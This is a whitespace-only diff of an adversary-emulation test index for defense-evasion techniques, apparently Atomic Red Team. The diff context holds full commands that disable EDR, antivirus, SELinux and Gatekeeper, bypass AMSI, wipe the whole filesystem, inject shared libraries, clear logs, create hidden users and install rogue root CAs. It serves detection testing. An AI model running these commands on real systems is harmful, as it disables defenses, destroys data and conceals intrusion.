@@ -26414,14 +26414,14 @@ defense-evasion:
dependencies:
- description: 'Check if ufw is installed on the machine and enabled.
-'
+ '
prereq_command: "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n*****
ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep
-q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1;
fi \n"
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26435,21 +26435,21 @@ defense-evasion:
auto_generated_guid: beaf815a-c883-4194-97e9-fdbbb2bbdd7c
description: 'Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if /etc/ufw/user.rules exists.
-'
+ '
prereq_command: 'if [ ! -f "/etc/ufw/user.rules" ]; then echo -e "\n*****
ufw NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26458,7 +26458,7 @@ defense-evasion:
grep "# THIS IS A COMMENT" /etc/ufw/user.rules
cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/ufw/user.rules
-'
+ '
- name: Edit UFW firewall ufw.conf file
auto_generated_guid: c1d8c4eb-88da-4927-ae97-c7c25893803b
description: "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf
@@ -26469,14 +26469,14 @@ defense-evasion:
dependencies:
- description: 'Check if /etc/ufw/ufw.conf exists.
-'
+ '
prereq_command: 'if [ ! -f "/etc/ufw/ufw.conf" ]; then echo -e "\n***** ufw
NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26496,14 +26496,14 @@ defense-evasion:
dependencies:
- description: 'Check if /etc/ufw/sysctl.conf exists.
-'
+ '
prereq_command: 'if [ ! -f "/etc/ufw/sysctl.conf" ]; then echo -e "\n*****
ufw NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26523,14 +26523,14 @@ defense-evasion:
dependencies:
- description: 'Check if /etc/default/ufw exists.
-'
+ '
prereq_command: 'if [ ! -f "/etc/default/ufw" ]; then echo -e "\n***** ufw
NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -26539,7 +26539,7 @@ defense-evasion:
grep "# THIS IS A COMMENT" /etc/default/ufw
cleanup_command: 'sed -i ''s/# THIS IS A COMMENT//g'' /etc/default/ufw
-'
+ '
- name: Tail the UFW firewall log file
auto_generated_guid: 419cca0c-fa52-4572-b0d7-bc7c6f388a27
description: "Print the last 10 lines of the Uncomplicated Firewall (UFW) log
@@ -26550,20 +26550,20 @@ defense-evasion:
dependencies:
- description: 'Check if /var/log/ufw.log exists.
-'
+ '
prereq_command: 'if [ ! -f "/var/log/ufw.log" ]; then echo -e "\n***** ufw
NOT logging *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
command: 'tail /var/log/ufw.log
-'
+ '
cleanup_command: ''
T1562.001:
technique:
@@ -26637,7 +26637,7 @@ defense-evasion:
auto_generated_guid: 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8
description: 'Disables syslog collection
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -26666,11 +26666,11 @@ defense-evasion:
dependencies:
- description: 'Package with rsyslog must be on system
-'
+ '
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
1; fi
-'
+ '
get_prereq_command: "sudo #{package_installer} \n"
executor:
command: "#{flavor_command}\n"
@@ -26681,7 +26681,7 @@ defense-evasion:
auto_generated_guid: ae8943f7-0f8d-44de-962d-fbc2e2f03eb8
description: 'Disable the Cb Response service
-'
+ '
supported_platforms:
- linux
executor:
@@ -26699,23 +26699,23 @@ defense-evasion:
auto_generated_guid: fc225f36-9279-4c39-b3f9-5141ab74f8d8
description: 'Disables SELinux enforcement
-'
+ '
supported_platforms:
- linux
executor:
command: 'setenforce 0
-'
+ '
cleanup_command: 'setenforce 1
-'
+ '
name: sh
elevation_required: true
- name: Stop Crowdstrike Falcon on Linux
auto_generated_guid: 828a1278-81cc-4802-96ab-188bf29ca77d
description: 'Stop and disable Crowdstrike Falcon on Linux
-'
+ '
supported_platforms:
- linux
executor:
@@ -26731,7 +26731,7 @@ defense-evasion:
auto_generated_guid: 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c
description: 'Disables Carbon Black Response
-'
+ '
supported_platforms:
- macos
executor:
@@ -26747,48 +26747,48 @@ defense-evasion:
auto_generated_guid: 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3
description: 'Disables LittleSnitch
-'
+ '
supported_platforms:
- macos
executor:
command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
-'
+ '
cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
-'
+ '
name: sh
elevation_required: true
- name: Disable OpenDNS Umbrella
auto_generated_guid: 07f43b33-1e15-4e99-be70-bc094157c849
description: 'Disables OpenDNS Umbrella
-'
+ '
supported_platforms:
- macos
executor:
command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
-'
+ '
cleanup_command: 'sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
-'
+ '
name: sh
elevation_required: true
- name: Disable macOS Gatekeeper
auto_generated_guid: 2a821573-fb3f-4e71-92c3-daac7432f053
description: 'Disables macOS Gatekeeper
-'
+ '
supported_platforms:
- macos
executor:
command: 'sudo spctl --master-disable
-'
+ '
cleanup_command: 'sudo spctl --master-enable
-'
+ '
name: sh
elevation_required: true
- name: Stop and unload Crowdstrike Falcon on macOS
@@ -26796,7 +26796,7 @@ defense-evasion:
description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon
on macOS
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -26834,40 +26834,40 @@ defense-evasion:
dependencies:
- description: 'Sysmon must be downloaded
-'
+ '
prereq_command: 'if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon
2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else {
exit 1 }
-'
+ '
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force
- description: 'sysmon must be Installed
-'
+ '
prereq_command: 'if(sc.exe query sysmon | findstr sysmon) { exit 0 } else
{ exit 1 }
-'
+ '
get_prereq_command: |
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
- description: 'sysmon filter must be loaded
-'
+ '
prereq_command: 'if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0
} else { exit 1 }
-'
+ '
get_prereq_command: |
sysmon -u
sysmon -accepteula -i
executor:
command: 'fltmc.exe unload #{sysmon_driver}
-'
+ '
cleanup_command: |
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
@@ -26879,7 +26879,7 @@ defense-evasion:
auto_generated_guid: a316fb2e-5344-470d-91c1-23e15c374edc
description: 'Uninstall Sysinternals Sysmon for Defense Evasion
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -26892,10 +26892,10 @@ defense-evasion:
dependencies:
- description: 'Sysmon executable must be available
-'
+ '
prereq_command: 'if(cmd /c where sysmon) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
@@ -26904,20 +26904,20 @@ defense-evasion:
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
- description: 'Sysmon must be installed
-'
+ '
prereq_command: 'if(cmd /c sc query sysmon) { exit 0} else { exit 1}
-'
+ '
get_prereq_command: 'cmd /c sysmon -i -accepteula
-'
+ '
executor:
command: 'sysmon -u
-'
+ '
cleanup_command: 'sysmon -i -accepteula >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: AMSI Bypass - AMSI InitFailed
@@ -26945,11 +26945,11 @@ defense-evasion:
command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}"
-Recurse
-'
+ '
cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers"
-Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
-'
+ '
name: powershell
elevation_required: true
- name: Disable Arbitrary Security Windows Service
@@ -27023,11 +27023,11 @@ defense-evasion:
command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
-Name DisableAntiSpyware -Value 1
-'
+ '
cleanup_command: 'Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows
Defender" -Name DisableAntiSpyware -Value 0
-'
+ '
name: powershell
elevation_required: true
- name: Disable Microsoft Office Security Features
@@ -27067,7 +27067,7 @@ defense-evasion:
command: '"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions
-All
-'
+ '
name: command_prompt
elevation_required: true
- name: Stop and Remove Arbitrary Security Windows Service
@@ -27077,7 +27077,7 @@ defense-evasion:
The Remove-Service cmdlet removes a Windows service in the registry and in
the service database.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -27098,7 +27098,7 @@ defense-evasion:
is located in a folder named with a random guid we need to identify it before
invoking the uninstaller.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -27185,7 +27185,7 @@ defense-evasion:
description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules
in your office-365 organization.
-'
+ '
supported_platforms:
- office-365
input_arguments:
@@ -27201,7 +27201,7 @@ defense-evasion:
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
-'
+ '
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
@@ -27265,17 +27265,17 @@ defense-evasion:
prereq_command: 'if (Test-Path #{DefenderControlExe}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic
expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl"
executor:
command: 'cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null
-'
+ '
cleanup_command: 'cmd /c #{DefenderControlExe} /E | Out-Null
-'
+ '
name: powershell
elevation_required: true
- name: Disable Defender Using NirSoft AdvancedRun
@@ -27300,11 +27300,11 @@ defense-evasion:
dependencies:
- description: 'Advancedrun.exe must exist at #{AdvancedRun_Location}
-'
+ '
prereq_command: 'if(Test-Path -Path #{AdvancedRun_Location}) {exit 0} else
{exit 1}
-'
+ '
get_prereq_command: |
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "$env:temp\advancedrun.zip"
Expand-Archive -path "$env:temp\advancedrun.zip" -destinationpath "$env:temp\" -Force
@@ -27319,7 +27319,7 @@ defense-evasion:
/WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs
8 /Run} Catch{}
-'
+ '
name: powershell
elevation_required: true
T1078.002:
@@ -27659,13 +27659,13 @@ defense-evasion:
Provider to be federated must be configured (outside of the scope of this
test).
-'
+ '
prereq_command: 'if (Get-Module AzureADPreview) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Install-Module -Name AzureADPreview -Force
-'
+ '
executor:
command: |
Import-Module AzureADPreview
@@ -28093,21 +28093,21 @@ defense-evasion:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
-'
+ '
cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
-'
+ '
name: bash
elevation_required: true
- name: Shared Library Injection via LD_PRELOAD
@@ -28132,18 +28132,18 @@ defense-evasion:
- description: 'The shared library must exist on disk at specified location
(#{path_to_shared_library})
-'
+ '
prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
-'
+ '
executor:
command: 'LD_PRELOAD=#{path_to_shared_library} ls
-'
+ '
name: bash
T1055.001:
technique:
@@ -28244,10 +28244,10 @@ defense-evasion:
dependencies:
- description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
@@ -28787,7 +28787,7 @@ defense-evasion:
auto_generated_guid: 562d737f-2fc6-4b09-8c2a-7f8ff0828480
description: 'Delete a single file from the temporary directory
-'
+ '
supported_platforms:
- linux
- macos
@@ -28799,14 +28799,14 @@ defense-evasion:
executor:
command: 'rm -f #{file_to_delete}
-'
+ '
name: sh
- name: Delete an entire folder - Linux/macOS
auto_generated_guid: a415f17e-ce8d-4ce2-a8b4-83b674e7017e
description: 'Recursively delete the temporary directory and all files contained
within it
-'
+ '
supported_platforms:
- linux
- macos
@@ -28818,14 +28818,14 @@ defense-evasion:
executor:
command: 'rm -rf #{folder_to_delete}
-'
+ '
name: sh
- name: Overwrite and delete a file with shred
auto_generated_guid: '039b4b10-2900-404b-b67f-4b6d49aa6499'
description: 'Use the `shred` command to overwrite the temporary file and then
delete it
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -28836,7 +28836,7 @@ defense-evasion:
executor:
command: 'shred -u #{file_to_shred}
-'
+ '
name: sh
- name: Delete a single file - Windows cmd
auto_generated_guid: 861ea0b4-708a-4d17-848d-186c9c7f17e3
@@ -28856,17 +28856,17 @@ defense-evasion:
- description: 'The file to delete must exist on disk at specified location
(#{file_to_delete})
-'
+ '
prereq_command: 'IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'echo deleteme_T1551.004 >> #{file_to_delete}
-'
+ '
executor:
command: 'del /f #{file_to_delete}
-'
+ '
name: command_prompt
- name: Delete an entire folder - Windows cmd
auto_generated_guid: ded937c4-2add-42f7-9c2c-c742b7a98698
@@ -28886,17 +28886,17 @@ defense-evasion:
- description: 'The file to delete must exist on disk at specified location
(#{folder_to_delete})
-'
+ '
prereq_command: 'IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'mkdir #{folder_to_delete}
-'
+ '
executor:
command: 'rmdir /s /q #{folder_to_delete}
-'
+ '
name: command_prompt
- name: Delete a single file - Windows PowerShell
auto_generated_guid: 9dee89bd-9a98-4c4f-9e2d-4256690b0e72
@@ -28904,7 +28904,7 @@ defense-evasion:
Upon execution, no output will be displayed. Use File Explorer to verify the
file was deleted.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -28918,17 +28918,17 @@ defense-evasion:
- description: 'The file to delete must exist on disk at specified location
(#{file_to_delete})
-'
+ '
prereq_command: 'if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{file_to_delete} | Out-Null
-'
+ '
executor:
command: 'Remove-Item -path #{file_to_delete}
-'
+ '
name: powershell
- name: Delete an entire folder - Windows PowerShell
auto_generated_guid: edd779e4-a509-4cba-8dfa-a112543dbfb1
@@ -28936,7 +28936,7 @@ defense-evasion:
Upon execution, no output will be displayed. Use File Explorer to verify the
folder was deleted.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -28950,18 +28950,18 @@ defense-evasion:
- description: 'The folder to delete must exist on disk at specified location
(#{folder_to_delete})
-'
+ '
prereq_command: 'if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'New-Item -Path #{folder_to_delete} -Type Directory |
Out-Null
-'
+ '
executor:
command: 'Remove-Item -Path #{folder_to_delete} -Recurse
-'
+ '
name: powershell
- name: Delete Filesystem - Linux
auto_generated_guid: f3aa95fe-4f10-4485-ad26-abf22a764c52
@@ -28969,13 +28969,13 @@ defense-evasion:
This technique was used by Amnesia IoT malware to avoid analysis. This test
is dangerous and destructive, do NOT use on production equipment.
-'
+ '
supported_platforms:
- linux
executor:
command: 'rm -rf / --no-preserve-root > /dev/null 2> /dev/null
-'
+ '
name: bash
- name: Delete Prefetch File
auto_generated_guid: 36f96049-0ad7-4a5f-8418-460acaeb92fb
@@ -28988,7 +28988,7 @@ defense-evasion:
command: 'Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem
-Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
-'
+ '
name: powershell
elevation_required: true
- name: Delete TeamViewer Log Files
@@ -29012,18 +29012,18 @@ defense-evasion:
- description: 'The folder to delete must exist on disk at specified location
(#{teamviewer_log_file})
-'
+ '
prereq_command: 'if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: 'New-Item -Path #{teamviewer_log_file} | Out-Null
-'
+ '
executor:
command: 'Remove-Item #{teamviewer_log_file}
-'
+ '
name: powershell
T1222:
technique:
@@ -29179,7 +29179,7 @@ defense-evasion:
auto_generated_guid: fb3d46c6-9480-4803-8d7d-ce676e1f1a9b
description: 'Gatekeeper Bypass via command line
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -29190,7 +29190,7 @@ defense-evasion:
executor:
command: 'sudo xattr -d com.apple.quarantine #{app_path}
-'
+ '
elevation_required: true
name: sh
T1484.001:
@@ -29479,7 +29479,7 @@ defense-evasion:
auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
description: 'Creates a hidden file inside a hidden directory
-'
+ '
supported_platforms:
- linux
- macos
@@ -29489,20 +29489,20 @@ defense-evasion:
echo "T1564.001" > /var/tmp/.hidden-directory/.hidden-file
cleanup_command: 'rm -rf /var/tmp/.hidden-directory/
-'
+ '
name: sh
- name: Mac Hidden file
auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9
description: 'Hide a file on MacOS
-'
+ '
supported_platforms:
- macos
executor:
command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00
40 00 FF FF FF FF 00 00"
-'
+ '
name: sh
- name: Create Windows System File with Attrib
auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32
@@ -29520,20 +29520,20 @@ defense-evasion:
dependencies:
- description: 'The file must exist on disk at specified location (#{file_to_modify})
-'
+ '
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
-'
+ '
executor:
command: 'attrib.exe +s #{file_to_modify}
-'
+ '
cleanup_command: 'del /A:S #{file_to_modify} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Create Windows Hidden File with Attrib
@@ -29552,27 +29552,27 @@ defense-evasion:
dependencies:
- description: 'The file must exist on disk at specified location (#{file_to_modify})
-'
+ '
prereq_command: 'IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
-'
+ '
get_prereq_command: 'echo system_Attrib_T1564.001 >> #{file_to_modify}
-'
+ '
executor:
command: 'attrib.exe +h #{file_to_modify}
-'
+ '
cleanup_command: 'del /A:H #{file_to_modify} >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Hidden files
auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379
description: 'Requires Apple Dev Tools
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -29583,13 +29583,13 @@ defense-evasion:
executor:
command: 'setfile -a V #{filename}
-'
+ '
name: sh
- name: Hide a Directory
auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3
description: 'Hide a directory on MacOS
-'
+ '
supported_platforms:
- macos
executor:
@@ -29598,22 +29598,22 @@ defense-evasion:
chflags hidden /var/tmp/T1564.001_mac.txt
cleanup_command: 'rm /var/tmp/T1564.001_mac.txt
-'
+ '
name: sh
- name: Show all hidden files
auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c
description: 'Show all hidden files on MacOS
-'
+ '
supported_platforms:
- macos
executor:
command: 'defaults write com.apple.finder AppleShowAllFiles YES
-'
+ '
cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO
-'
+ '
name: sh
- name: Hide Files Through Registry
auto_generated_guid: f650456b-bd49-4bc1-ae9d-271b5b9581e7
@@ -29696,7 +29696,7 @@ defense-evasion:
description: 'Add a hidden user on macOS using Unique ID < 500 (users with that
ID are hidden by default)
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -29707,17 +29707,17 @@ defense-evasion:
executor:
command: 'sudo dscl . -create /Users/#{user_name} UniqueID 333
-'
+ '
cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
-'
+ '
elevation_required: true
name: sh
- name: Create Hidden User using IsHidden option
auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31
description: 'Add a hidden user on macOS using IsHidden optoin
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -29728,10 +29728,10 @@ defense-evasion:
executor:
command: 'sudo dscl . -create /Users/#{user_name} IsHidden 1
-'
+ '
cleanup_command: 'sudo dscl . -delete /Users/#{user_name}
-'
+ '
elevation_required: true
name: sh
T1564.003:
@@ -29813,7 +29813,7 @@ defense-evasion:
executor:
command: 'Start-Process #{powershell_command}
-'
+ '
name: powershell
T1564:
technique:
@@ -29896,7 +29896,7 @@ defense-evasion:
dependencies:
- description: 'Microsoft Word must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "Word.Application" | Out-Null
@@ -29906,7 +29906,7 @@ defense-evasion:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
-'
+ '
executor:
command: |
$macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
@@ -29916,7 +29916,7 @@ defense-evasion:
Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
-'
+ '
name: powershell
- name: Create a Hidden User Called "$"
auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
@@ -30091,7 +30091,7 @@ defense-evasion:
auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
description: 'Disables history collection in shells
-'
+ '
supported_platforms:
- linux
- macos
@@ -30259,7 +30259,7 @@ defense-evasion:
auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
description: 'Emulates modification of auditd configuration files
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -30294,7 +30294,7 @@ defense-evasion:
auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
description: 'Emulates modification of syslog configuration.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -30439,10 +30439,10 @@ defense-evasion:
executor:
command: 'fsutil usn deletejournal /D C:
-'
+ '
cleanup_command: 'fsutil usn createjournal m=1000 a=100 c:
-'
+ '
name: command_prompt
elevation_required: true
T1202:
@@ -30538,7 +30538,7 @@ defense-evasion:
executor:
command: 'forfiles /p c:\windows\system32 /m notepad.exe /c #{process}
-'
+ '
name: command_prompt
- name: Indirect Command Execution - conhost.exe
auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29
@@ -30556,7 +30556,7 @@ defense-evasion:
executor:
command: 'conhost.exe "#{process}"
-'
+ '
name: command_prompt
T1553.004:
technique:
@@ -30656,7 +30656,7 @@ defense-evasion:
auto_generated_guid: 9c096ec4-fd42-419d-a762-d64cc950627e
description: 'Creates a root CA with openssl
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -30683,7 +30683,7 @@ defense-evasion:
auto_generated_guid: 53bcf8a0-1549-4b85-b919-010c56d724ff
description: 'Creates a root CA with openssl
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -30699,10 +30699,10 @@ defense-evasion:
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
-'
+ '
prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -30716,7 +30716,7 @@ defense-evasion:
auto_generated_guid: cc4a0b8c-426f-40ff-9426-4e10e5bf4c49
description: 'Creates a root CA with openssl
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -30732,10 +30732,10 @@ defense-evasion:
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
-'
+ '
prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;
-'
+ '
get_prereq_command: |
if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi;
openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename}
@@ -30743,14 +30743,14 @@ defense-evasion:
command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain"
"#{cert_filename}"
-'
+ '
name: sh
elevation_required: true
- name: Install root CA on Windows
auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1
description: 'Creates a root CA with Powershell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -30762,10 +30762,10 @@ defense-evasion:
dependencies:
- description: 'Verify the certificate exists. It generates if not on disk.
-'
+ '
prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
-'
+ '
get_prereq_command: |
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -30787,7 +30787,7 @@ defense-evasion:
auto_generated_guid: 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f
description: 'Creates a root CA with certutil
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -30799,10 +30799,10 @@ defense-evasion:
dependencies:
- description: 'Certificate must exist at specified location (#{pfx_path})
-'
+ '
prereq_command: 'if (Test-Path #{pfx_path}) { exit 0 } else { exit 1 }
-'
+ '
get_prereq_command: |
$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
@@ -30810,7 +30810,7 @@ defense-evasion:
executor:
command: 'certutil -addstore my #{pfx_path}
-'
+ '
cleanup_command: |
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
@@ -30914,10 +30914,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -30982,10 +30982,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31028,7 +31028,7 @@ defense-evasion:
description: 'Executes the installer assembly class constructor. Upon execution,
version information will be displayed the .NET framework install utility.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31053,10 +31053,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31099,7 +31099,7 @@ defense-evasion:
